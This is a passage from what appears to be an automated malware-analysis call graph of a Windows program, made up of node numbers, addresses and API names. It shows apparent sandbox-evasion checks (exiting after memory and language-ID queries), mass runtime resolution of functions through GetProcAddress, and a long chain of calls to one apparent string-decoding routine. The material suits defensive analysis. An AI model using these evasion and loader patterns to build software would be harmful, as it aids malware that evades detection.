26148->26149 26151 726641 GetProcAddress GetProcAddress 26149->26151 26152 72666c 26149->26152 26155 7263d7 20 API calls 26150->26155 26151->26152 26153 726675 GetProcAddress 26152->26153 26154 726688 26152->26154 26153->26154 26156 726691 GetProcAddress 26154->26156 26157 7266a4 26154->26157 26155->26147 26156->26157 26158 7266d7 26157->26158 26159 7266ad GetProcAddress GetProcAddress 26157->26159 26158->26011 26159->26158 26161 701057 ExitProcess 26160->26161 26162 70105e VirtualAlloc 26160->26162 26163 70107d 26162->26163 26164 7010b1 26163->26164 26165 70108a VirtualFree 26163->26165 26166 7010c0 26164->26166 26165->26164 26167 7010d0 GlobalMemoryStatusEx 26166->26167 26169 701112 ExitProcess 26167->26169 26170 7010f5 26167->26170 26170->26169 26171 70111a GetUserDefaultLangID 26170->26171 26171->26022 26171->26023 26173 722b24 26172->26173 26173->26027 26174->26046 26387 721820 26175->26387 26177 721b81 sscanf 26426 702a20 26177->26426 26180 721be9 26183 71ffd0 26180->26183 26181 721be2 ExitProcess 26182 721bd6 26182->26180 26182->26181 26184 71ffe0 26183->26184 26185 720019 lstrlen 26184->26185 26186 72000d lstrcpy 26184->26186 26187 7200d0 26185->26187 26186->26185 26188 7200e7 lstrlen 26187->26188 26189 7200db lstrcpy 26187->26189 26190 7200ff 26188->26190 26189->26188 26191 720116 lstrlen 26190->26191 26192 72010a lstrcpy 26190->26192 26193 72012e 26191->26193 26192->26191 26194 720145 26193->26194 26195 720139 lstrcpy 26193->26195 26428 721570 26194->26428 26195->26194 26198 72016e 26199 720183 lstrcpy 26198->26199 26200 72018f lstrlen 26198->26200 26199->26200 26201 7201a8 26200->26201 26202 7201c9 lstrlen 26201->26202 26203 7201bd lstrcpy 26201->26203 26204 7201e8 26202->26204 26203->26202 26205 720200 lstrcpy 26204->26205 26206 72020c lstrlen 26204->26206 26205->26206 26207 72026a 26206->26207 26208 720282 lstrcpy 26207->26208 26209 72028e 26207->26209 26208->26209 26438 702e70 26209->26438 26217 720540 26218 721570 4 API calls 26217->26218 26219 72054f 26218->26219 26220 7205a1 lstrlen 26219->26220 26221 720599 lstrcpy 26219->26221 26222 7205bf 26220->26222 26221->26220 26223 7205d1 lstrcpy lstrcat 26222->26223 26224 7205e9 26222->26224 26223->26224 26225 720614 26224->26225 26226 72060c lstrcpy 26224->26226 26227 72061b lstrlen 26225->26227 26226->26225 26228 720636 26227->26228 26229 72064a lstrcpy lstrcat 26228->26229 26230 720662 26228->26230 26229->26230 26231 720687 26230->26231 26232 72067f lstrcpy 26230->26232 26233 72068e lstrlen 26231->26233 26232->26231 26234 7206b3 26233->26234 26235 7206c7 lstrcpy lstrcat 26234->26235 26236 7206db 26234->26236 26235->26236 26237 720704 lstrcpy 26236->26237 26238 72070c 26236->26238 26237->26238 26239 720751 26238->26239 26240 720749 lstrcpy 26238->26240 27194 722740 GetWindowsDirectoryA 26239->27194 26240->26239 26242 720785 27203 704c50 26242->27203 26243 72075d 26243->26242 26244 72077d lstrcpy 26243->26244 26244->26242 26246 72078f 27357 718ca0 StrCmpCA 26246->27357 26248 72079b 26249 701530 8 API calls 26248->26249 26250 7207bc 26249->26250 26251 7207e5 lstrcpy 26250->26251 26252 7207ed 26250->26252 26251->26252 27375 7060d0 80 API calls 26252->27375 26254 7207fa 27376 7181b0 10 API calls 26254->27376 26256 720809 26257 701530 8 API calls 26256->26257 26258 72082f 26257->26258 26259 720856 lstrcpy 26258->26259 26260 72085e 26258->26260 26259->26260 27377 7060d0 80 API calls 26260->27377 26262 72086b 27378 717ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26262->27378 26264 720876 26265 701530 8 API calls 26264->26265 26266 7208a1 26265->26266 26267 7208d5 26266->26267 26268 7208c9 lstrcpy 26266->26268 27379 7060d0 80 API calls 26267->27379 26268->26267 26270 7208db 27380 718050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26270->27380 26272 7208e6 26273 701530 8 API calls 26272->26273 26274 7208f7 26273->26274 26275 720926 lstrcpy 26274->26275 26276 72092e 26274->26276 26275->26276 27381 705640 8 API calls 26276->27381 26278 720933 26279 701530 8 API calls 26278->26279 26280 72094c 26279->26280 27382 717280 1501 API calls 26280->27382 26282 72099f 26283 701530 8 API calls 26282->26283 26284 7209cf 26283->26284 26285 7209f6 lstrcpy 26284->26285 26286 7209fe 26284->26286 26285->26286 27383 7060d0 80 API calls 26286->27383 26288 720a0b 27384 7183e0 7 API calls 26288->27384 26290 720a18 26291 701530 8 API calls 26290->26291 26292 720a29 26291->26292 27385 7024e0 230 API calls 26292->27385 26294 720a6b 26295 720b40 26294->26295 26296 720a7f 26294->26296 26298 701530 8 API calls 26295->26298 26297 701530 8 API calls 26296->26297 26299 720aa5 26297->26299 26301 720b59 26298->26301 26302 720ad4 26299->26302 26303 720acc lstrcpy 26299->26303 26300 720b87 27389 7060d0 80 API calls 26300->27389 26301->26300 26304 720b7f lstrcpy 26301->26304 27386 7060d0 80 API calls 26302->27386 26303->26302 26304->26300 26307 720b8d 27390 71c840 70 API calls 26307->27390 26308 720ada 27387 7185b0 47 API calls 26308->27387 26311 720b38 26314 720bd1 26311->26314 26317 701530 8 API calls 26311->26317 26312 720ae5 26313 701530 8 API calls 26312->26313 26316 720af6 26313->26316 26315 720bfa 26314->26315 26319 701530 8 API calls 26314->26319 26320 720c23 26315->26320 26325 701530 8 API calls 26315->26325 27388 71d0f0 118 API calls 26316->27388 26318 720bb9 26317->26318 27391 71d7b0 104 API calls 26318->27391 26324 720bf5 26319->26324 26323 720c4c 26320->26323 26328 701530 8 API calls 26320->26328 26329 720c75 26323->26329 26335 701530 8 API calls 26323->26335 27393 71dfa0 149 API calls 26324->27393 26326 720c1e 26325->26326 27394 71e500 108 API calls 26326->27394 26327 720bbe 26333 701530 8 API calls 26327->26333 26334 720c47 26328->26334 26331 720c9e 26329->26331 26336 701530 8 API calls 26329->26336 26338 720cc7 26331->26338 26343 701530 8 API calls 26331->26343 26337 720bcc 26333->26337 27395 71e720 120 API calls 26334->27395 26340 720c70 26335->26340 26341 720c99 26336->26341 27392 71ecb0 100 API calls 26337->27392 26344 720cf0 26338->26344 26350 701530 8 API calls 26338->26350 27396 71e9e0 110 API calls 26340->27396 27397 707bc0 154 API calls 26341->27397 26349 720cc2 26343->26349 26346 720d04 26344->26346 26347 720dca 26344->26347 26351 701530 8 API calls 26346->26351 26352 701530 8 API calls 26347->26352 27398 71eb70 108 API calls 26349->27398 26354 720ceb 26350->26354 26356 720d2a 26351->26356 26358 720de3 26352->26358 27399 7241e0 91 API calls 26354->27399 26359 720d56 lstrcpy 26356->26359 26360 720d5e 26356->26360 26357 720e11 27403 7060d0 80 API calls 26357->27403 26358->26357 26361 720e09 lstrcpy 26358->26361 26359->26360 27400 7060d0 80 API calls 26360->27400 26361->26357 26364 720e17 27404 71c840 70 API calls 26364->27404 26365 720d64 27401 7185b0 47 API calls 26365->27401 26368 720dc2 26371 701530 8 API calls 26368->26371 26369 720d6f 26370 701530 8 API calls 26369->26370 26372 720d80 26370->26372 26375 720e39 26371->26375 27402 71d0f0 118 API calls 26372->27402 26374 720e67 27405 7060d0 80 API calls 26374->27405 26375->26374 26376 720e5f lstrcpy 26375->26376 26376->26374 26378 720e74 26380 720e95 26378->26380 27406 721660 12 API calls 26378->27406 26380->26058 26381->26029 26383 704a76 RtlAllocateHeap 26382->26383 26385 704ab4 VirtualProtect 26383->26385 26385->26061 26388 72182e 26387->26388 26389 721855 lstrlen 26388->26389 26390 721849 lstrcpy 26388->26390 26391 721873 26389->26391 26390->26389 26392 721885 lstrcpy lstrcat 26391->26392 26393 721898 26391->26393 26392->26393 26394 7218c7 26393->26394 26395 7218bf lstrcpy 26393->26395 26396 7218ce lstrlen 26394->26396 26395->26394 26397 7218e6 26396->26397 26398 7218f2 lstrcpy lstrcat 26397->26398 26399 721906 26397->26399 26398->26399 26400 721935 26399->26400 26401 72192d lstrcpy 26399->26401 26402 72193c lstrlen 26400->26402 26401->26400 26403 721958 26402->26403 26404 72196a lstrcpy lstrcat 26403->26404 26405 72197d 26403->26405 26404->26405 26406 7219ac 26405->26406 26407 7219a4 lstrcpy 26405->26407 26408 7219b3 lstrlen 26406->26408 26407->26406 26409 7219cb 26408->26409 26410 7219d7 lstrcpy lstrcat 26409->26410 26411 7219eb 26409->26411 26410->26411 26412 721a1a 26411->26412 26413 721a12 lstrcpy 26411->26413 26414 721a21 lstrlen 26412->26414 26413->26412 26415 721a3d 26414->26415 26416 721a4f lstrcpy lstrcat 26415->26416 26417 721a62 26415->26417 26416->26417 26418 721a91 26417->26418 26419 721a89 lstrcpy 26417->26419 26420 721a98 lstrlen 26418->26420 26419->26418 26421 721ab4 26420->26421 26422 721ac6 lstrcpy lstrcat 26421->26422 26423 721ad9 26421->26423 26422->26423 26424 721b08 26423->26424 26425 721b00 lstrcpy 26423->26425 26424->26177 26425->26424 26427 702a24 SystemTimeToFileTime SystemTimeToFileTime 26426->26427 26427->26180 26427->26182 26429 72157f 26428->26429 26430 72159f lstrcpy 26429->26430 26431 7215a7 26429->26431 26430->26431 26432 7215d7 lstrcpy 26431->26432 26433 7215df 26431->26433 26432->26433 26434 72160f lstrcpy 26433->26434 26435 721617 26433->26435 26434->26435 26436 720155 lstrlen 26435->26436 26437 721647 lstrcpy 26435->26437 26436->26198 26437->26436 26439 704a60 2 API calls 26438->26439 26440 702e82 26439->26440 26441 704a60 2 API calls 26440->26441 26442 702ea0 26441->26442 26443 704a60 2 API calls 26442->26443 26444 702eb6 26443->26444 26445 704a60 2 API calls 26444->26445 26446 702ecb 26445->26446 26447 704a60 2 API calls 26446->26447 26448 702eec 26447->26448 26449 704a60 2 API calls 26448->26449 26450 702f01 26449->26450 26451 704a60 2 API calls 26450->26451 26452 702f19 26451->26452 26453 704a60 2 API calls 26452->26453 26454 702f3a 26453->26454 26455 704a60 2 API calls 26454->26455 26456 702f4f 26455->26456 26457 704a60 2 API calls 26456->26457 26458 702f65 26457->26458 26459 704a60 2 API calls 26458->26459 26460 702f7b 26459->26460 26461 704a60 2 API calls 26460->26461 26462 702f91 26461->26462 26463 704a60 2 API calls 26462->26463 26464 702faa 26463->26464 26465 704a60 2 API calls 26464->26465 26466 702fc0 26465->26466 26467 704a60 2 API calls 26466->26467 26468 702fd6 26467->26468 26469 704a60 2 API calls 26468->26469 26470 702fec 26469->26470 26471 704a60 2 API calls 26470->26471 26472 703002 26471->26472 26473 704a60 2 API calls 26472->26473 26474 703018 26473->26474 26475 704a60 2 API calls 26474->26475 26476 703031 26475->26476 26477 704a60 2 API calls 26476->26477 26478 703047 26477->26478 26479 704a60 2 API calls 26478->26479 26480 70305d 26479->26480 26481 704a60 2 API calls 26480->26481 26482 703073 26481->26482 26483 704a60 2 API calls 26482->26483 26484 703089 26483->26484 26485 704a60 2 API calls 26484->26485 26486 70309f 26485->26486 26487 704a60 2 API calls 26486->26487 26488 7030b8 26487->26488 26489 704a60 2 API calls 26488->26489 26490 7030ce 26489->26490 26491 704a60 2 API calls 26490->26491 26492 7030e4 26491->26492 26493 704a60 2 API calls 26492->26493 26494 7030fa 26493->26494 26495 704a60 2 API calls 26494->26495 26496 703110 26495->26496 26497 704a60 2 API calls 26496->26497 26498 703126 26497->26498 26499 704a60 2 API calls 26498->26499 26500 70313f 26499->26500 26501 704a60 2 API calls 26500->26501 26502 703155 26501->26502 26503 704a60 2 API calls 26502->26503 26504 70316b 26503->26504 26505 704a60 2 API calls 26504->26505 26506 703181 26505->26506 26507 704a60 2 API calls 26506->26507 26508 703197 26507->26508 26509 704a60 2 API calls 26508->26509 26510 7031ad 26509->26510 26511 704a60 2 API calls 26510->26511 26512 7031c6 26511->26512 26513 704a60 2 API calls 26512->26513 26514 7031dc 26513->26514 26515 704a60 2 API calls 26514->26515 26516 7031f2 26515->26516 26517 704a60 2 API calls 26516->26517 26518 703208 26517->26518 26519 704a60 2 API calls 26518->26519 26520 70321e 26519->26520 26521 704a60 2 API calls 26520->26521 26522 703234 26521->26522 26523 704a60 2 API calls 26522->26523 26524 70324d 26523->26524 26525 704a60 2 API calls 26524->26525 26526 703263 26525->26526 26527 704a60 2 API calls 26526->26527 26528 703279 26527->26528 26529 704a60 2 API calls 26528->26529 26530 70328f 26529->26530 26531 704a60 2 API calls 26530->26531 26532 7032a5 26531->26532 26533 704a60 2 API calls 26532->26533 26534 7032bb 26533->26534 26535 704a60 2 API calls 26534->26535 26536 7032d4 26535->26536 26537 704a60 2 API calls 26536->26537 26538 7032ea 26537->26538 26539 704a60 2 API calls 26538->26539 26540 703300 26539->26540 26541 704a60 2 API calls 26540->26541 26542 703316 26541->26542 26543 704a60 2 API calls 26542->26543 26544 70332c 26543->26544 26545 704a60 2 API calls 26544->26545 26546 703342 26545->26546 26547 704a60 2 API calls 26546->26547 26548 70335b 26547->26548 26549 704a60 2 API calls 26548->26549 26550 703371 26549->26550 26551 704a60 2 API calls 26550->26551 26552 703387 26551->26552 26553 704a60 2 API calls 26552->26553 26554 70339d 26553->26554 26555 704a60 2 API calls 26554->26555 26556 7033b3 26555->26556 26557 704a60 2 API calls 26556->26557 26558 7033c9 26557->26558 26559 704a60 2 API calls 26558->26559 26560 7033e2 26559->26560 26561 704a60 2 API calls 26560->26561 26562 7033f8 26561->26562 26563 704a60 2 API calls 26562->26563 26564 70340e 26563->26564 26565 704a60 2 API calls 26564->26565 26566 703424 26565->26566 26567 704a60 2 API calls 26566->26567 26568 70343a 26567->26568 26569 704a60 2 API calls 26568->26569 26570 703450 26569->26570 26571 704a60 2 API calls 26570->26571 26572 703469 26571->26572 26573 704a60 2 API calls 26572->26573 26574 70347f 26573->26574 26575 704a60 2 API calls 26574->26575 26576 703495 26575->26576 26577 704a60 2 API calls 26576->26577 26578 7034ab 26577->26578 26579 704a60 2 API calls 26578->26579 26580 7034c1 26579->26580 26581 704a60 2 API calls 26580->26581 26582 7034d7 26581->26582 26583 704a60 2 API calls 26582->26583 26584 7034f0 26583->26584 26585 704a60 2 API calls 26584->26585 26586 703506 26585->26586 26587 704a60 2 API calls 26586->26587 26588 70351c 26587->26588 26589 704a60 2 API calls 26588->26589 26590 703532 26589->26590 26591 704a60 2 API calls 26590->26591 26592 703548 26591->26592 26593 704a60 2 API calls 26592->26593 26594 70355e 26593->26594 26595 704a60 2 API calls 26594->26595 26596 703577 26595->26596 26597 704a60 2 API calls 26596->26597 26598 70358d 26597->26598 26599 704a60 2 API calls 26598->26599 26600 7035a3 26599->26600 26601 704a60 2 API calls 26600->26601 26602 7035b9 26601->26602 26603 704a60 2 API calls 26602->26603 26604 7035cf 26603->26604 26605 704a60 2 API calls 26604->26605 26606 7035e5 26605->26606 26607 704a60 2 API calls 26606->26607 26608 7035fe 26607->26608 26609 704a60 2 API calls 26608->26609 26610 703614 26609->26610 26611 704a60 2 API calls 26610->26611 26612 70362a 26611->26612 26613 704a60 2 API calls 26612->26613 26614 703640 26613->26614 26615 704a60 2 API calls 26614->26615 26616 703656 26615->26616 26617 704a60 2 API calls 26616->26617 26618 70366c 26617->26618 26619 704a60 2 API calls 26618->26619 26620 703685 26619->26620 26621 704a60 2 API calls 26620->26621 26622 70369b 26621->26622 26623 704a60 2 API calls 26622->26623 26624 7036b1 26623->26624 26625 704a60 2 API calls 26624->26625 26626 7036c7 26625->26626 26627 704a60 2 API calls 26626->26627 26628 7036dd 26627->26628 26629 704a60 2 API calls 26628->26629 26630 7036f3 26629->26630 26631 704a60 2 API calls 26630->26631 26632 70370c 26631->26632 26633 704a60 2 API calls 26632->26633 26634 703722 26633->26634 26635 704a60 2 API calls 26634->26635 26636 703738 26635->26636 26637 704a60 2 API calls 26636->26637 26638 70374e 26637->26638 26639 704a60 2 API calls 26638->26639 26640 703764 26639->26640 26641 704a60 2 API calls 26640->26641 26642 70377a 26641->26642 26643 704a60 2 API calls 26642->26643 26644 703793 26643->26644 26645 704a60 2 API calls 26644->26645 26646 7037a9 26645->26646 26647 704a60 2 API calls 26646->26647 26648 7037bf 26647->26648 26649 704a60 2 API calls 26648->26649 26650 7037d5 26649->26650 26651 704a60 2 API calls 26650->26651 26652 7037eb 26651->26652 26653 704a60 2 API calls 26652->26653 26654 703801 26653->26654 26655 704a60 2 API calls 26654->26655 26656 70381a 26655->26656 26657 704a60 2 API calls 26656->26657 26658 703830 26657->26658 26659 704a60 2 API calls 26658->26659 26660 703846 26659->26660 26661 704a60 2 API calls 26660->26661 26662 70385c 26661->26662 26663 704a60 2 API calls 26662->26663 26664 703872 26663->26664 26665 704a60 2 API calls 26664->26665 26666 703888 26665->26666 26667 704a60 2 API calls 26666->26667 26668 7038a1 26667->26668 26669 704a60 2 API calls 26668->26669 26670 7038b7 26669->26670 26671 704a60 2 API calls 26670->26671 26672 7038cd 26671->26672 26673 704a60 2 API calls 26672->26673 26674 7038e3 26673->26674 26675 704a60 2 API calls 26674->26675 26676 7038f9 26675->26676 26677 704a60 2 API calls 26676->26677 26678 70390f 26677->26678 26679 704a60 2 API calls 26678->26679 26680 703928 26679->26680 26681 704a60 2 API calls 26680->26681 26682 70393e 26681->26682 26683 704a60 2 API calls 26682->26683 26684 703954 26683->26684 26685 704a60 2 API calls 26684->26685 26686 70396a 26685->26686 26687 704a60 2 API calls 26686->26687 26688 703980 26687->26688 26689 704a60 2 API calls 26688->26689 26690 703996 26689->26690 26691 704a60 2 API calls 26690->26691 26692 7039af 26691->26692 26693 704a60 2 API calls 26692->26693 26694 7039c5 26693->26694 26695 704a60 2 API calls 26694->26695 26696 7039db 26695->26696 26697 704a60 2 API calls 26696->26697 26698 7039f1 26697->26698 26699 704a60 2 API calls 26698->26699 26700 703a07 26699->26700 26701 704a60 2 API calls 26700->26701 26702 703a1d 26701->26702 26703 704a60 2 API calls 26702->26703 26704 703a36 26703->26704 26705 704a60 2 API calls 26704->26705 26706 703a4c 26705->26706 26707 704a60 2 API calls 26706->26707 26708 703a62 26707->26708 26709 704a60 2 API calls 26708->26709 26710 703a78 26709->26710 26711 704a60 2 API calls 26710->26711 26712 703a8e 26711->26712 26713 704a60 2 API calls 26712->26713 26714 703aa4 26713->26714 26715 704a60 2 API calls 26714->26715 26716 703abd 26715->26716 26717 704a60 2 API calls 26716->26717 26718 703ad3 26717->26718 26719 704a60 2 API calls 26718->26719 26720 703ae9 26719->26720 26721 704a60 2 API calls 26720->26721 26722 703aff 26721->26722 26723 704a60 2 API calls 26722->26723 26724 703b15 26723->26724 26725 704a60 2 API calls 26724->26725 26726 703b2b 26725->26726 26727 704a60 2 API calls 26726->26727 26728 703b44 26727->26728 26729 704a60 2 API calls 26728->26729 26730 703b5a 26729->26730 26731 704a60 2 API calls 26730->26731 26732 703b70 26731->26732 26733 704a60 2 API calls 26732->26733 26734 703b86 26733->26734 26735 704a60 2 API calls 26734->26735 26736 703b9c 26735->26736 26737 704a60 2 API calls 26736->26737 26738 703bb2 26737->26738 26739 704a60 2 API calls 26738->26739 26740 703bcb 26739->26740 26741 704a60 2 API calls 26740->26741 26742 703be1 26741->26742 26743 704a60 2 API calls 26742->26743 26744 703bf7 26743->26744 26745 704a60 2 API calls 26744->26745 26746 703c0d 26745->26746 26747 704a60 2 API calls 26746->26747 26748 703c23 26747->26748 26749 704a60 2 API calls 26748->26749 26750 703c39 26749->26750 26751 704a60 2 API calls 26750->26751 26752 703c52 26751->26752 26753 704a60 2 API calls 26752->26753 26754 703c68 26753->26754 26755 704a60 2 API calls 26754->26755 26756 703c7e 26755->26756 26757 704a60 2 API calls 26756->26757 26758 703c94 26757->26758 26759 704a60 2 API calls 26758->26759 26760 703caa 26759->26760 26761 704a60 2 API calls 26760->26761 26762 703cc0 26761->26762 26763 704a60 2 API calls 26762->26763 26764 703cd9 26763->26764 26765 704a60 2 API calls 26764->26765 26766 703cef 26765->26766 26767 704a60 2 API calls 26766->26767 26768 703d05 26767->26768 26769 704a60 2 API calls 26768->26769 26770 703d1b 26769->26770 26771 704a60 2 API calls 26770->26771 26772 703d31 26771->26772 26773 704a60 2 API calls 26772->26773 26774 703d47 26773->26774 26775 704a60 2 API calls 26774->26775 26776 703d60 26775->26776 26777 704a60 2 API calls 26776->26777 26778 703d76 26777->26778 26779 704a60 2 API calls 26778->26779 26780 703d8c 26779->26780 26781 704a60 2 API calls 26780->26781 26782 703da2 26781->26782 26783 704a60 2 API calls 26782->26783 26784 703db8 26783->26784 26785 704a60 2 API calls 26784->26785 26786 703dce 26785->26786 26787 704a60 2 API calls 26786->26787 26788 703de7 26787->26788 26789 704a60 2 API calls 26788->26789 26790 703dfd 26789->26790 26791 704a60 2 API calls 26790->26791 26792 703e13 26791->26792 26793 704a60 2 API calls 26792->26793 26794 703e29 26793->26794 26795 704a60 2 API calls 26794->26795 26796 703e3f 26795->26796 26797 704a60 2 API calls 26796->26797 26798 703e55 26797->26798 26799 704a60 2 API calls 26798->26799 26800 703e6e 26799->26800 26801 704a60 2 API calls 26800->26801 26802 703e84 26801->26802 26803 704a60 2 API calls 26802->26803 26804 703e9a 26803->26804 26805 704a60 2 API calls 26804->26805 26806 703eb0 26805->26806 26807 704a60 2 API calls 26806->26807 26808 703ec6 26807->26808 26809 704a60 2 API calls 26808->26809 26810 703edc 26809->26810 26811 704a60 2 API calls 26810->26811 26812 703ef5 26811->26812 26813 704a60 2 API calls 26812->26813 26814 703f0b 26813->26814 26815 704a60 2 API calls 26814->26815 26816 703f21 26815->26816 26817 704a60 2 API calls 26816->26817 26818 703f37 26817->26818 26819 704a60 2 API calls 26818->26819 26820 703f4d 26819->26820 26821 704a60 2 API calls 26820->26821 26822 703f63 26821->26822 26823 704a60 2 API calls 26822->26823 26824 703f7c 26823->26824 26825 704a60 2 API calls 26824->26825 26826 703f92 26825->26826 26827 704a60 2 API calls 26826->26827 26828 703fa8 26827->26828 26829 704a60 2 API calls 26828->26829 26830 703fbe 26829->26830 26831 704a60 2 API calls 26830->26831 26832 703fd4 26831->26832 26833 704a60 2 API calls 26832->26833 26834 703fea 26833->26834 26835 704a60 2 API calls 26834->26835 26836 704003 26835->26836 26837 704a60 2 API calls 26836->26837 26838 704019 26837->26838 26839 704a60 2 API calls 26838->26839 26840 70402f 26839->26840 26841 704a60 2 API calls 26840->26841 26842 704045 26841->26842 26843 704a60 2 API calls 26842->26843 26844 70405b 26843->26844 26845 704a60 2 API calls 26844->26845 26846 704071 26845->26846 26847 704a60 2 API calls 26846->26847 26848 70408a 26847->26848 26849 704a60 2 API calls 26848->26849 26850 7040a0 26849->26850 26851 704a60 2 API calls 26850->26851 26852 7040b6 26851->26852 26853 704a60 2 API calls 26852->26853 26854 7040cc 26853->26854 26855 704a60 2 API calls 26854->26855 26856 7040e2 26855->26856 26857 704a60 2 API calls 26856->26857 26858 7040f8 26857->26858 26859 704a60 2 API calls 26858->26859 26860 704111 26859->26860 26861 704a60 2 API calls 26860->26861 26862 704127 26861->26862 26863 704a60 2 API calls 26862->26863 26864 70413d 26863->26864 26865 704a60 2 API calls 26864->26865 26866 704153 26865->26866 26867 704a60 2 API calls 26866->26867 26868 704169 26867->26868 26869 704a60 2 API calls 26868->26869 26870 70417f 26869->26870 26871 704a60 2 API calls 26870->26871 26872 704198 26871->26872 26873 704a60 2 API calls 26872->26873 26874 7041ae 26873->26874 26875 704a60 2 API calls 26874->26875 26876 7041c4 26875->26876 26877 704a60 2 API calls 26876->26877 26878 7041da 26877->26878 26879 704a60 2 API calls 26878->26879 26880 7041f0 26879->26880 26881 704a60 2 API calls 26880->26881 26882 704206 26881->26882 26883 704a60 2 API calls 26882->26883 26884 70421f 26883->26884 26885 704a60 2 API calls 26884->26885 26886 704235 26885->26886 26887 704a60 2 API calls 26886->26887 26888 70424b 26887->26888 26889 704a60 2 API calls 26888->26889 26890 704261 26889->26890 26891 704a60 2 API calls 26890->26891 26892 704277 26891->26892 26893 704a60 2 API calls 26892->26893 26894 70428d 26893->26894 26895 704a60 2 API calls 26894->26895 26896 7042a6 26895->26896 26897 704a60 2 API calls 26896->26897 26898 7042bc 26897->26898 26899 704a60 2 API calls 26898->26899 26900 7042d2 26899->26900 26901 704a60 2 API calls 26900->26901 26902 7042e8 26901->26902 26903 704a60 2 API calls 26902->26903 26904 7042fe 26903->26904 26905 704a60 2 API calls 26904->26905 26906 704314 26905->26906 26907 704a60 2 API calls 26906->26907 26908 70432d 26907->26908 26909 704a60 2 API calls 26908->26909 26910 704343 26909->26910 26911 704a60 2 API calls 26910->26911 26912 704359 26911->26912 26913 704a60 2 API calls 26912->26913 26914 70436f 26913->26914 26915 704a60 2 API calls 26914->26915 26916 704385 26915->26916 26917 704a60 2 API calls 26916->26917 26918 70439b 26917->26918 26919 704a60 2 API calls 26918->26919 26920 7043b4 26919->26920 26921 704a60 2 API calls 26920->26921 26922 7043ca 26921->26922 26923 704a60 2 API calls 26922->26923 26924 7043e0 26923->26924 26925 704a60 2 API calls 26924->26925 26926 7043f6 26925->26926 26927 704a60 2 API calls 26926->26927 26928 70440c 26927->26928 26929 704a60 2 API calls 26928->26929 26930 704422 26929->26930 26931 704a60 2 API calls 26930->26931 26932 70443b 26931->26932 26933 704a60 2 API calls 26932->26933 26934 704451 26933->26934 26935 704a60 2 API calls 26934->26935 26936 704467 26935->26936 26937 704a60 2 API calls 26936->26937 26938 70447d 26937->26938 26939 704a60 2 API calls 26938->26939 26940 704493 26939->26940 26941 704a60 2 API calls 26940->26941 26942 7044a9 26941->26942 26943 704a60 2 API calls 26942->26943 26944 7044c2 26943->26944 26945 704a60 2 API calls 26944->26945 26946 7044d8 26945->26946 26947 704a60 2 API calls 26946->26947 26948 7044ee 26947->26948 26949 704a60 2 API calls 26948->26949 26950 704504 26949->26950 26951 704a60 2 API calls 26950->26951 26952 70451a 26951->26952 26953 704a60 2 API calls 26952->26953 26954 704530 26953->26954 26955 704a60 2 API calls 26954->26955 26956 704549 26955->26956 26957 704a60 2 API calls 26956->26957 26958 70455f 26957->26958 26959 704a60 2 API calls 26958->26959 26960 704575 26959->26960 26961 704a60 2 API calls 26960->26961 26962 70458b 26961->26962 26963 704a60 2 API calls 26962->26963 26964 7045a1 26963->26964 26965 704a60 2 API calls 26964->26965 26966 7045b7 26965->26966 26967 704a60 2 API calls 26966->26967 26968 7045d0 26967->26968 26969 704a60 2 API calls 26968->26969 26970 7045e6 26969->26970 26971 704a60 2 API calls 26970->26971 26972 7045fc 26971->26972 26973 704a60 2 API calls 26972->26973 26974 704612 26973->26974 26975 704a60 2 API calls 26974->26975 26976 704628 26975->26976 26977 704a60 2 API calls 26976->26977 26978 70463e 26977->26978 26979 704a60 2 API calls 26978->26979 26980 704657 26979->26980 26981 704a60 2 API calls 26980->26981 26982 70466d 26981->26982 26983 704a60 2 API calls 26982->26983 26984 704683 26983->26984 26985 704a60 2 API calls 26984->26985 26986 704699 26985->26986 26987 704a60 2 API calls 26986->26987 26988 7046af 26987->26988 26989 704a60 2 API calls 26988->26989 26990 7046c5 26989->26990 26991 704a60 2 API calls 26990->26991 26992 7046de 26991->26992 26993 704a60 2 API calls 26992->26993 26994 7046f4 26993->26994 26995 704a60 2 API calls 26994->26995 26996 70470a 26995->26996 26997 704a60 2 API calls 26996->26997 26998 704720 26997->26998 26999 704a60 2 API calls 26998->26999 27000 704736 26999->27000 27001 704a60 2 API calls 27000->27001 27002 70474c 27001->27002 27003 704a60 2 API calls 27002->27003 27004 704765 27003->27004 27005 704a60 2 API calls 27004->27005 27006 70477b 27005->27006 27007 704a60 2 API calls 27006->27007 27008 704791 27007->27008 27009 704a60 2 API calls 27008->27009 27010 7047a7 27009->27010 27011 704a60 2 API calls 27010->27011 27012 7047bd 27011->27012 27013 704a60 2 API calls 27012->27013 27014 7047d3 27013->27014 27015 704a60 2 API calls 27014->27015 27016 7047ec 27015->27016 27017 704a60 2 API calls 27016->27017 27018 704802 27017->27018 27019 704a60 2 API calls 27018->27019 27020 704818 27019->27020 27021 704a60 2 API calls 27020->27021 27022 70482e 27021->27022 27023 704a60 2 API calls 27022->27023 27024 704844 27023->27024 27025 704a60 2 API calls 27024->27025 27026 70485a 27025->27026 27027 704a60 2 API calls 27026->27027 27028 704873 27027->27028 27029 704a60 2 API calls 27028->27029 27030 704889 27029->27030 27031 704a60 2 API calls 27030->27031 27032 70489f 27031->27032 27033 704a60 2 API calls 27032->27033 27034 7048b5 27033->27034 27035 704a60 2 API calls 27034->27035 27036 7048cb 27035->27036 27037 704a60 2 API calls 27036->27037 27038 7048e1 27037->27038 27039 704a60 2 API calls 27038->27039 27040 7048fa 27039->27040 27041 704a60 2 API calls 27040->27041 27042 704910 27041->27042 27043 704a60 2 API calls 27042->27043 27044 704926 27043->27044 27045 704a60 2 API calls 27044->27045 27046 70493c 27045->27046 27047 704a60 2 API calls 27046->27047 27048 704952 27047->27048 27049 704a60 2 API calls 27048->27049 27050 704968 27049->27050 27051 704a60 2 API calls 27050->27051 27052 704981 27051->27052 27053 704a60 2 API calls 27052->27053 27054 704997 27053->27054 27055 704a60 2 API calls 27054->27055 27056 7049ad 27055->27056 27057 704a60 2 API calls 27056->27057 27058 7049c3 27057->27058 27059 704a60 2 API calls 27058->27059 27060 7049d9 27059->27060 27061 704a60 2 API calls 27060->27061 27062 7049ef 27061->27062 27063 704a60 2 API calls 27062->27063 27064 704a08 27063->27064 27065 704a60 2 API calls 27064->27065 27066 704a1e 27065->27066 27067 704a60 2 API calls 27066->27067 27068 704a34 27067->27068 27069 704a60 2 API calls 27068->27069 27070 704a4a 27069->27070 27071 7266e0 27070->27071 27072 726afe 8 API calls 27071->27072 27073 7266ed 43 API calls 27071->27073 27074 726b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27072->27074 27075 726c08 27072->27075 27073->27072 27074->27075 27076 